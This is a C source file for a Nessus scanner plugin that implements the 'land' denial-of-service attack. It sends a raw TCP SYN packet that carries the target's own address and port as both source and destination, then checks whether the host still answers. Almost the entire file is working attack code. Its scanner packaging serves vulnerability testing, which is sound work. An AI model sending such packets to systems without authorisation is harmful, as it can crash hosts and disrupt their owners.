/* land.c by m3lt, FLC
   crashes a win95 box */

#include <config.h>
#include <nessuslib.h>
#include <stdio.h>
#include <stdlib.h>
#ifdef HAVE_STRING_H
#include <string.h>
#endif /* HAVE_STRING_H */
#ifdef HAVE_STRINGS_H
#include <strings.h>
#endif /* HAVE_STRINGS_H */        
#include <netdb.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>

/* Minor portability tweaks. --KGB */
#if (!defined(__GLIBC__) || __GLIBC__ < 2)
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#else
#include <netinet/tcp.h>
#define IP_TCP IPPROTO_TCP
#define th_sport source
#define th_dport dest
#define th_seq seq
#define th_off doff
#define th_win window
#define th_sum check
#endif /* GLIBC */

#define NAME "land"
#define DESC "This plugin is the Nessus implementation of the land attack"
#define COPYRIGHT "M3lt, FLC"
#define SUMM "denial of service using the 'land' attack"

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int test_open_port(struct arglist * args);
int plugin_init(struct arglist *desc);
int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}



int plugin_run(struct arglist * args)
{
	struct in_addr * adr;
        struct sockaddr_in sin;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;
	int on;


        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;
        adr = plug_get_host_ip(args);
	sin.sin_addr = *adr;
	sin.sin_port = htons(rand()%65000);

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

	tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);

#if (!defined(__GLIBC__) || __GLIBC__ < 2)
	tcpheader->th_flags=TH_SYN;
#else
	tcpheader->syn=1;
#endif /* GLIBC */

        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
          return(-1);
        }


        close(sock);
        if(!(on=test_open_port(args)))post_hole(args, -1, 
"A denial of service could be perfomed using the 'land' attack
Solution : contact your vendor for a fix");
 if(on==-1)post_info(args, -1, 
"It *may* be possible that the remote host crashed after the 'land' attack,
although it could not be verified");
        return(0);
}

int test_open_port(struct arglist * args)
{
 struct arglist * host; 
 struct arglist * ports;
 int i;
 int soc;

 host = arg_get_value(args, "HOSTNAME");
 ports = arg_get_value(host, "PORTS");
 if(ports && ports->name)i = atoi(ports->name);
 else return(-1);
 
 if((soc = open_sock_tcp(args, i))>0){
 	close(soc);
 	return(1);
 	}
 else return(0);
}
